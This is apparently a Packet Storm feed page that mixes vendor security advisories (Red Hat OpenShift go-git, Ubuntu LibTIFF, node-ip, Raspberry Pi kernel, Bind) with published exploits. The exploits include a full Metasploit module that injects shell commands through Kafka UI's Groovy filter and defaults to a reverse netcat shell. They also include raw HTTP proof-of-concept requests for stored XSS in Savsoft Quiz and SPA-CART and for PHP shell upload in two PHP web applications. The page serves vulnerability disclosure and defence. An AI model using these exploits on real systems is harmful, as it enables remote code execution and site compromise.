Red Hat Security Advisory 2024-0832-03 - Red Hat OpenShift Container Platform release 4.12.50 is now available with updates to packages and images that fix several bugs. Issues addressed include denial of service and traversal vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0832.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Critical: OpenShift Container Platform 4.12.50 security and extras update  
Advisory ID:        RHSA-2024:0832-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0832  
Issue date:         2024-02-21  
Revision:           03  
CVE Names:          CVE-2023-49568  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.12.50 is now available with updates to packages and images that fix several bugs.

This release includes a security update for Red Hat OpenShift Container Platform 4.12.

Red Hat Product Security has rated this update as having a security impact of  Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.12.50. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:0833

Security Fix(es):

* go-git: Maliciously crafted Git server replies can lead to path traversal  
and RCE on go-git clients (CVE-2023-49569)  
* go-git: Maliciously crafted Git server replies can cause DoS on go-git  
clients (CVE-2023-49568)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.12 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.12/updating/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html

CVEs:

CVE-2023-49568

References:

https://access.redhat.com/security/updates/classification/#critical  
https://bugzilla.redhat.com/show_bug.cgi?id=2258143  
https://bugzilla.redhat.com/show_bug.cgi?id=2258165

Red Hat Security Advisory 2024-0832-03

Ubuntu Security Notice 6644-1 - It was discovered that LibTIFF incorrectly handled certain files. If a user were tricked into opening a specially crafted file, an attacker could possibly use this issue to cause the application to crash, resulting in a denial of service. It was discovered that LibTIFF incorrectly handled certain image files with the tiffcp utility. If a user were tricked into opening a specially crafted image file, an attacker could possibly use this issue to cause tiffcp to crash, resulting in a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6644-1  
February 19, 2024

tiff vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 16.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 14.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in LibTIFF.

Software Description:  
- tiff: Tag Image File Format (TIFF) library

Details:

It was discovered that LibTIFF incorrectly handled certain files. If  
a user were tricked into opening a specially crafted file, an attacker  
could possibly use this issue to cause the application to crash, resulting  
in a denial of service. (CVE-2023-52356)

It was discovered that LibTIFF incorrectly handled certain image files  
with the tiffcp utility. If a user were tricked into opening a specially  
crafted image file, an attacker could possibly use this issue to cause  
tiffcp to crash, resulting in a denial of service. (CVE-2023-6228)

It was discovered that LibTIFF incorrectly handled certain files. If  
a user were tricked into opening a specially crafted file, an attacker  
could possibly use this issue to cause the application to consume  
resources, resulting in a denial of service. (CVE-2023-6277)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   libtiff-tools                   4.5.1+git230720-1ubuntu1.1  
   libtiff6                        4.5.1+git230720-1ubuntu1.1

Ubuntu 20.04 LTS:  
   libtiff-tools                   4.1.0+git191117-2ubuntu0.20.04.12  
   libtiff5                        4.1.0+git191117-2ubuntu0.20.04.12

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   libtiff-tools                   4.0.9-5ubuntu0.10+esm5  
   libtiff5                        4.0.9-5ubuntu0.10+esm5

Ubuntu 16.04 LTS (Available with Ubuntu Pro):  
   libtiff-tools                   4.0.6-1ubuntu0.8+esm15  
   libtiff5                        4.0.6-1ubuntu0.8+esm15

Ubuntu 14.04 LTS (Available with Ubuntu Pro):  
   libtiff-tools                   4.0.3-7ubuntu0.11+esm12  
   libtiff5                        4.0.3-7ubuntu0.11+esm12

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6644-1  
   CVE-2023-52356, CVE-2023-6228, CVE-2023-6277

Package Information:  
   https://launchpad.net/ubuntu/+source/tiff/4.5.1+git230720-1ubuntu1.1  
   https://launchpad.net/ubuntu/+source/tiff/4.1.0+git191117-2ubuntu0.20.04.12

Ubuntu Security Notice USN-6644-1

Ubuntu Security Notice 6643-1 - Emre Durmaz discovered that NPM IP package incorrectly distinguished between private and public IP addresses. A remote attacker could possibly use this issue to perform Server-Side Request Forgery attacks.

==========================================================================  
Ubuntu Security Notice USN-6643-1  
February 19, 2024

node-ip vulnerability  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.10  
- Ubuntu 22.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 20.04 LTS (Available with Ubuntu Pro)  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

NPM IP could be made to expose sensitive information over the  
network.

Software Description:  
- node-ip: IP address utilities for node.js

Details:

Emre Durmaz discovered that NPM IP package incorrectly distinguished  
between private and public IP addresses. A remote attacker could  
possibly use this issue to perform  
Server-Side Request Forgery (SSRF) attacks.

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.10:  
   node-ip                         2.0.0+~1.1.0-1ubuntu0.1

Ubuntu 22.04 LTS (Available with Ubuntu Pro):  
   node-ip                         1.1.5+~1.1.0-1ubuntu0.1~esm1

Ubuntu 20.04 LTS (Available with Ubuntu Pro):  
   node-ip                         1.1.5-5ubuntu0.1~esm1

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   node-ip                         1.1.5-1ubuntu0.1~esm1

In general, a standard system update will make all the necessary changes.

References:  
   https://ubuntu.com/security/notices/USN-6643-1  
   CVE-2023-42282

Package Information:  
https://launchpad.net/ubuntu/+source/node-ip/2.0.0+~1.1.0-1ubuntu0.1

Ubuntu Security Notice USN-6643-1

Ubuntu Security Notice 6625-3 - Marek Marczykowski-Górecki discovered that the Xen event channel infrastructure implementation in the Linux kernel contained a race condition. An attacker in a guest VM could possibly use this to cause a denial of service. Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driver in the Linux kernel during device removal. A privileged attacker could use this to cause a denial of service.

==========================================================================  
Ubuntu Security Notice USN-6625-3  
February 20, 2024

linux-raspi, linux-raspi-5.4 vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 LTS  
- Ubuntu 18.04 LTS (Available with Ubuntu Pro)

Summary:

Several security issues were fixed in the Linux kernel.

Software Description:  
- linux-raspi: Linux kernel for Raspberry Pi systems  
- linux-raspi-5.4: Linux kernel for Raspberry Pi systems

Details:

Marek Marczykowski-Górecki discovered that the Xen event channel  
infrastructure implementation in the Linux kernel contained a race  
condition. An attacker in a guest VM could possibly use this to cause a  
denial of service (paravirtualized device unavailability). (CVE-2023-34324)

Zheng Wang discovered a use-after-free in the Renesas Ethernet AVB driver  
in the Linux kernel during device removal. A privileged attacker could use  
this to cause a denial of service (system crash). (CVE-2023-35827)

It was discovered that a race condition existed in the Linux kernel when  
performing operations with kernel objects, leading to an out-of-bounds  
write. A local attacker could use this to cause a denial of service (system  
crash) or execute arbitrary code. (CVE-2023-45863)

黄思聪 discovered that the NFC Controller Interface (NCI) implementation in  
the Linux kernel did not properly handle certain memory allocation failure  
conditions, leading to a null pointer dereference vulnerability. A local  
attacker could use this to cause a denial of service (system crash).  
(CVE-2023-46343)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 LTS:  
   linux-image-5.4.0-1102-raspi    5.4.0-1102.114  
   linux-image-raspi               5.4.0.1102.132  
   linux-image-raspi2              5.4.0.1102.132

Ubuntu 18.04 LTS (Available with Ubuntu Pro):  
   linux-image-5.4.0-1102-raspi    5.4.0-1102.114~18.04.1  
   linux-image-raspi-hwe-18.04     5.4.0.1102.99

After a standard system update you need to reboot your computer to make  
all the necessary changes.

ATTENTION: Due to an unavoidable ABI change the kernel updates have  
been given a new version number, which requires you to recompile and  
reinstall all third party kernel modules you might have installed.  
Unless you manually uninstalled the standard kernel metapackages  
(e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual,  
linux-powerpc), a standard system upgrade will automatically perform  
this as well.

References:  
   https://ubuntu.com/security/notices/USN-6625-3  
   https://ubuntu.com/security/notices/USN-6625-1  
   CVE-2023-34324, CVE-2023-35827, CVE-2023-45863, CVE-2023-46343

Package Information:  
   https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1102.114

Ubuntu Security Notice USN-6625-3

A command injection vulnerability exists in Kafka UI versions 0.4.0 through 0.7.1 that allows an attacker to inject and execute arbitrary shell commands via the groovy filter parameter at the topic section.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  prepend Msf::Exploit::Remote::AutoCheck  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Kafka UI Unauthenticated Remote Command Execution via the Groovy Filter option.',        'Description' => %q{          A command injection vulnerability exists in Kafka ui between `v0.4.0` and `v0.7.1` allowing          an attacker to inject and execute arbitrary shell commands via the `groovy` filter parameter          at the `topic` section.        },        'License' => MSF_LICENSE,        'Author' => [          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor          'BobTheShopLifter and Thingstad', # Discovery of the vulnerability CVE-2023-52251        ],        'References' => [          ['CVE', '2023-52251'],          ['URL', 'https://attackerkb.com/topics/ATJ1hTVB8H/cve-2023-52251'],          ['URL', 'https://github.com/BobTheShoplifter/CVE-2023-52251-POC']        ],        'DisclosureDate' => '2023-09-27',        'Platform' => ['unix', 'linux'],        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],        'Privileged' => false,        'Targets' => [          [            'Unix/Linux Command',            {              'Platform' => ['unix', 'linux'],              'Arch' => [ARCH_CMD],              'Type' => :unix_cmd,              'Payload' => {                'Encoder' => 'cmd/base64',                'BadChars' => "\x00"              },              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/reverse_netcat'              }            }          ]        ],        'DefaultTarget' => 0,        'DefaultOptions' => {          'RPORT' => 8080,          'SSL' => false        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]        }      )    )  end  def vuln_version?    @version = ''    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'actuator', 'info')    })    if res && res.code == 200 && (res.body.include?('build') || res.body.include?('git'))      res_json = res.get_json_document      unless res_json.blank?        if res.body.include?('build')          @version = res_json['build']['version'].delete_prefix('v') # remove v from vx.x.x        elsif res.body.include?('git')          # use case where only the git commit id gets returned without the version information          # determine version using the git commit id to match the first 7 chars of the sha commit stored in data/kafka_ui_versions.json file.          git_commit_id = res_json['git']['commit']['id']          kafka_ui_versions_json = JSON.parse(File.read(::File.join(Msf::Config.data_directory, 'kafka_ui_versions.json'), mode: 'rb'))          unless kafka_ui_versions_json.blank?            # loop thru the list of commits and return the version based a match on the first 7 chars of the sha commit else return nil            kafka_ui_versions_json.each do |tag|              if tag['commit']['sha'][0, 7] == git_commit_id                @version = tag['name'].delete_prefix('v')                break              end            end          end        end      end      return Rex::Version.new(@version) <= Rex::Version.new('0.7.1') && Rex::Version.new(@version) >= Rex::Version.new('0.4.0') if @version.match(/\d\.\d\.\d/)    end    false  end  def get_cluster    res = send_request_cgi({      'method' => 'GET',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters')    })    if res && res.code == 200 && res.body.include?('status')      res_json = res.get_json_document      unless res_json.blank?        # loop thru list of clusters and return an active cluster with topic count > 0 else return nil        res_json.each do |cluster|          if cluster['status'] == 'online' || cluster['topicCount'] > 0            return cluster['name']          end        end      end    end    nil  end  def create_topic(cluster)    topic_name = Rex::Text.rand_text_alphanumeric(4..10)    post_data = {      name: topic_name.to_s,      partitions: 1,      replicationFactor: 1,      configs:        {          'cleanup.policy': 'delete',          'retention.bytes': '-1'        }    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics'),      'data' => post_data.to_s    })    if res && res.code == 200 && res.body.include?(topic_name.to_s)      res_json = res.get_json_document      unless res_json.blank?        return res_json['name']      end    end    nil  end  def delete_topic(cluster, topic)    res = send_request_cgi({      'method' => 'DELETE',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s)    })    return true if res && res.code == 200    false  end  def produce_message(cluster, topic)    # Create a dummy message to trigger the groovy script execution    post_data = {      partition: 0,      key: 'null',      content: 'null',      keySerde: 'String',      valueSerde: 'String'    }.to_json    res = send_request_cgi({      'method' => 'POST',      'ctype' => 'application/json',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', cluster.to_s, 'topics', topic.to_s, 'messages'),      'data' => post_data.to_s    })    return true if res && res.code == 200    false  end  def execute_command(cmd, _opts = {})    payload = "Process p=new ProcessBuilder(\"sh\",\"-c\",\"#{cmd}\").redirectErrorStream(true).start()"    return send_request_cgi({      'method' => 'GET',      'ctype' => 'application/x-www-form-urlencoded',      'uri' => normalize_uri(target_uri.path, 'api', 'clusters', @cluster.to_s, 'topics', @new_topic.to_s, 'messages'),      'vars_get' => {        'q' => payload.to_s,        'filterQueryType' => 'GROOVY_SCRIPT',        'attempt' => 2,        'limit' => 100,        'page' => 0,        'seekDirection' => 'FORWARD',        'keySerde' => 'String',        'valueSerde' => 'String',        'seekType' => 'BEGINNING'      }    })  end  def check    vprint_status("Checking if #{peer} can be exploited.")    return CheckCode::Appears("Kafka-ui version: #{@version}") if vuln_version?    unless @version.blank?      if @version.match(/\d\.\d\.\d/)        return CheckCode::Safe("Kafka-ui version: #{@version}")      else        return CheckCode::Detected("Kafka-ui unknown version: #{@version}")      end    end    CheckCode::Safe  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    vprint_status('Searching for active Kafka cluster...')    @cluster = get_cluster    fail_with(Failure::NotFound, 'Could not find or connect to an active Kafka cluster.') if @cluster.nil?    vprint_good("Active Kafka cluster found: #{@cluster}")    vprint_status('Creating a new topic...')    @new_topic = create_topic(@cluster)    fail_with(Failure::Unknown, 'Could not create a new topic.') if @new_topic.nil?    vprint_good("New topic created: #{@new_topic}")    vprint_status('Trigger Groovy script payload execution by creating a message...')    fail_with(Failure::PayloadFailed, 'Could not trigger the Groovy script payload execution.') unless produce_message(@cluster, @new_topic)    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    end    # cleaning up the mess and remove new created topic    vprint_status('Removing tracks...')    if delete_topic(@cluster, @new_topic)      vprint_good("Successfully deleted topic #{@new_topic}.")    else      print_error("Could not delete topic #{@new_topic}. Manually cleaning required.")    end  endend

Kafka UI 0.7.1 Command Injection

Ubuntu Security Notice 6642-1 - Shoham Danino, Anat Bremler-Barr, Yehuda Afek, and Yuval Shavitt discovered that Bind incorrectly handled parsing large DNS messages. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service. Elias Heftrig, Haya Schulmann, Niklas Vogel, and Michael Waidner discovered that Bind incorrectly handled validating DNSSEC messages. A remote attacker could possibly use this issue to cause Bind to consume resources, leading to a denial of service.

    ==========================================================================Ubuntu Security Notice USN-6642-1February 19, 2024bind9 vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 20.04 LTSSummary:Several security issues were fixed in Bind.Software Description:- bind9: Internet Domain Name ServerDetails:Shoham Danino, Anat Bremler-Barr, Yehuda Afek, and Yuval Shavitt discoveredthat Bind incorrectly handled parsing large DNS messages. A remote attackercould possibly use this issue to cause Bind to consume resources, leadingto a denial of service. (CVE-2023-4408)Elias Heftrig, Haya Schulmann, Niklas Vogel, and Michael Waidner discoveredthat Bind icorrectly handled validating DNSSEC messages. A remote attackercould possibly use this issue to cause Bind to consume resources, leadingto a denial of service. (CVE-2023-50387)It was discovered that Bind incorrectly handled preparing an NSEC3 closestencloser proof. A remote attacker could possibly use this issue to causeBind to consume resources, leading to a denial of service. (CVE-2023-50868)It was discovered that Bind incorrectly handled reverse zone queries whennxdomain-redirect is enabled. A remote attacker could possibly use thisissue to cause Bind to crash, leading to a denial of service.(CVE-2023-5517)It was discovered that Bind incorrectly handled certain specific recursivequery patterns. A remote attacker could possibly use this issue to causeBind to consume memory, leading to a denial of service. (CVE-2023-6516)Bind has been updated to 9.6.48. In addition to security fixes, the updatedpackages contain bug fixes, new features, and possibly incompatiblechanges.Please see the following for more information:https://downloads.isc.org/isc/bind9/9.16.48/doc/arm/html/notes.htmlUpdate instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 20.04 LTS:   bind9                           1:9.16.48-0ubuntu0.20.04.1This update uses a new upstream release, which includes additional bugfixes. In general, a standard system update will make all the necessarychanges.References:   https://ubuntu.com/security/notices/USN-6642-1   CVE-2023-4408, CVE-2023-50387, CVE-2023-50868, CVE-2023-5517,   CVE-2023-6516Package Information:   https://launchpad.net/ubuntu/+source/bind9/1:9.16.48-0ubuntu0.20.04.1

Ubuntu Security Notice USN-6642-1

Savsoft Quiz version 6.0 Enterprise suffers from a persistent cross site scripting vulnerability.

    # Exploit Title: Savsoft Quiz v6.0 Enterprise - Persistent Cross-Site Scripting# Date: 2024-01-03# Exploit Author: Eren Sen# Vendor: SAVSOFT QUIZ# Vendor Homepage: https://savsoftquiz.com# Software Link: https://savsoftquiz.com/web/index.php/online-demo/# Version: < 6.0# CVE-ID: N/A# Tested on: Kali Linux / Windows 10# Vulnerabilities Discovered Date : 2024/01/03# Persistent Cross Site Scripting (XSS) Vulnerability# Vulnerable Parameter Type: POST# Vulnerable Parameter: quiz_name# Proof of Concepts:https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/edit_quiz/13# HTTP Request:POST /Savsoft_Quizdemk1my5jr/index.php/quiz/insert_quiz/ HTTP/1.1Host: demos1.softaculous.comCookie: ci_session=xxxxxxxxxxxxxxxxxxxxxxxxxContent-Length: 411Cache-Control: max-age=0Sec-Ch-Ua:Sec-Ch-Ua-Mobile: ?0Sec-Ch-Ua-Platform: ""Upgrade-Insecure-Requests: 1Origin: https://demos1.softaculous.comContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: https://demos1.softaculous.com/Savsoft_Quizdemk1my5jr/index.php/quiz/add_newAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: closequiz_name=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&description=%3Cp%3Etest%3C%2Fp%3E&start_date=2024-01-04+01%3A00%3A27&end_date=2025-01-03+01%3A00%3A27&duration=10&maximum_attempts=10&pass_percentage=50&correct_score=1&incorrect_score=0&ip_address=&view_answer=1&with_login=1&show_chart_rank=1&camera_req=0&gids%5B%5D=1&quiz_template=Default&question_selection=0&quiz_price=0&gen_certificate=0&certificate_text=

Savsoft Quiz 6.0 Enterprise Cross Site Scripting

SPA-CART CMS version 1.9.0.3 suffers from a persistent cross site scripting vulnerability.

# Exploit Title: SPA-CART CMS - Stored XSS  
# Date: 2024-01-03  
# Exploit Author: Eren Sen  
# Vendor: SPA-Cart  
# Vendor Homepage: https://spa-cart.com/  
# Software Link: https://demo.spa-cart.com/  
# Version: [1.9.0.3]  
# CVE-ID: N/A  
# Tested on: Kali Linux / Windows 10  
# Vulnerabilities Discovered Date : 2024/01/03

# Vulnerability Type: Stored Cross Site Scripting (XSS) Vulnerability  
# Vulnerable Parameter Type: POST  
# Vulnerable Parameter: descr

# Proof of Concept: demo.spa-cart.com/product/258

# HTTP Request:

POST ////admin/products/258 HTTP/2  
Host: demo.spa-cart.com  
Cookie: PHPSESSID=xxxxxxxxxxxxxxxxxx; remember=xxxxxxxxxxxxxxxx  
Content-Length: 1906  
Sec-Ch-Ua:  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryUsO8JxBs6LhB8LSl  
X-Requested-With: XMLHttpRequest  
Sec-Ch-Ua-Mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.199 Safari/537.36  
Sec-Ch-Ua-Platform: ""  
Origin: https://demo.spa-cart.com  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: https://demo.spa-cart.com////admin/products/258  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="mode"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="sku"

SKU386

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="name"

asdf

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="cleanurl"

Wholesale-DIY-Jewelry-Faceted-70pcs-6-8mm-Red-AB-Rondelle-glass-Crystal-Beads  
------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="avail"

1000

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="price"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="list_price"

2

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="weight"

0.00

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categoryid"

42

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

8

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="categories[]"

37

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="brandid"

4

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="status"

1

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl

Content-Disposition: form-data; name="descr"

<script>alert(1)</script>

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="title_tag"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_keywords"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl  
Content-Disposition: form-data; name="meta_description"

------WebKitFormBoundaryUsO8JxBs6LhB8LSl--

SPA-CART CMS 1.9.0.3 Cross Site Scripting

Petrol Pump Management Software version 1.0 suffers from a remote shell upload vulnerability.

# Exploit Title: Petrol pump management software - File Upload Remote Code Execution (RCE) (unauthenticated)  
# Google Dork: N/A  
# Application: Petrol pump management software  
# Date: 20.02.2024  
# Bugs: File Upload Remote Code Execution (RCE) (unauthenticated)  
# Exploit Author: SoSPiro  
# Vendor Homepage: https://www.sourcecodester.com/  
# Software Link: https://www.sourcecodester.com/php/17180/petrol-pump-management-software-free-download.html  
# Version: 1.0  
# Tested on: Windows 10 64 bit Wampserver   
# CVE : N/A

## Vulnerability Description:

Due to a security vulnerability in "fuelflow/admin/app/web_crud.php," unauthorized users can upload   
files using the "POST" method. The uploaded files are stored in the "/fuelflow/assets/images" folder.   
This allows malicious individuals to execute unauthorized commands on the system.

## Staus: HIGH-CRITICAL Vulnerability

## Proof of Concept (PoC):

Video:  
https://drive.google.com/file/d/1_jue-UhpASC_XxcUWU-QhMYDrSIehnWx/view

// File upload Request

POST /zerday/fuelflow/admin/app/web_crud.php HTTP/1.1  
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate, br  
Content-Type: multipart/form-data; boundary=---------------------------82750242321210078514140255085  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/zer/fuelflow/admin/web.php  
Cookie: PHPSESSID=1  
Upgrade-Insecure-Requests: 1  
Sec-Fetch-Dest: document  
Sec-Fetch-Mode: navigate  
Sec-Fetch-Site: same-origin  
Sec-Fetch-User: ?1

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="id"

1  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photo1_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photo1"; filename="3.php"  
Content-Type: image/png

<?php phpinfo();?>  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="title"

FuelFlow lite - Developed by Mayuri K. tessss  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="old_photos_img"

test.png  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="photos"; filename=""  
Content-Type: application/octet-stream

-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="sitekey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="secretkey"

test  
-----------------------------82750242321210078514140255085  
Content-Disposition: form-data; name="update"

-----------------------------82750242321210078514140255085--

//  Phpinfo file locaton 

/zerday/fuelflow/assets/images/65d45a6080eca.php

Petrol Pump Management Software 1.0 Shell Upload

Tourism Management System version 2.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Tourism Management System v2.0 - Arbitrary File Upload# Google Dork: N/A# Exploit Author: SoSPiro# Date: 2024-02-18# Vendor Homepage: https://phpgurukul.com# Software Link: https://phpgurukul.com/tourism-management-system-free-download/# Version: 2.0# Tested on: Windows 10 Pro# Impact: Allows admin to upload all files to the web server# CVE : N/A# Exploit Description:The application is prone to an arbitrary file-upload because it fails to adequately sanitize user-supplied input.# PoC requestPOST /zer/tms/admin/change-image.php?imgid=1 HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:122.0) Gecko/20100101 Firefox/122.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflate, brContent-Type: multipart/form-data; boundary=---------------------------390927495111779706051786831201Content-Length: 361Origin: http://localhostConnection: closeReferer: http://localhost/zer/tms/admin/change-image.php?imgid=1Cookie: PHPSESSID=eqms3ipedmm41hqa1djnu1euhvUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1X-PwnFox-Color: red-----------------------------390927495111779706051786831201Content-Disposition: form-data; name="packageimage"; filename="phpinfo.php"Content-Type: text/plain<?php phpinfo();?>-----------------------------390927495111779706051786831201Content-Disposition: form-data; name="submit"-----------------------------390927495111779706051786831201--===========================================================================================- Response -HTTP/1.1 200 OKDate: Sun, 18 Feb 2024 04:33:37 GMTServer: Apache/2.4.54 (Win64) PHP/8.1.13 mod_fcgid/2.3.10-devX-Powered-By: PHP/8.1.13Expires: Thu, 19 Nov 1981 08:52:00 GMTCache-Control: no-store, no-cache, must-revalidatePragma: no-cacheConnection: closeContent-Type: text/html; charset=UTF-8Content-Length: 8146============================================================================================- File location -http://localhost/zer/tms/admin/pacakgeimages/phpinfo.php

Source

Packet Storm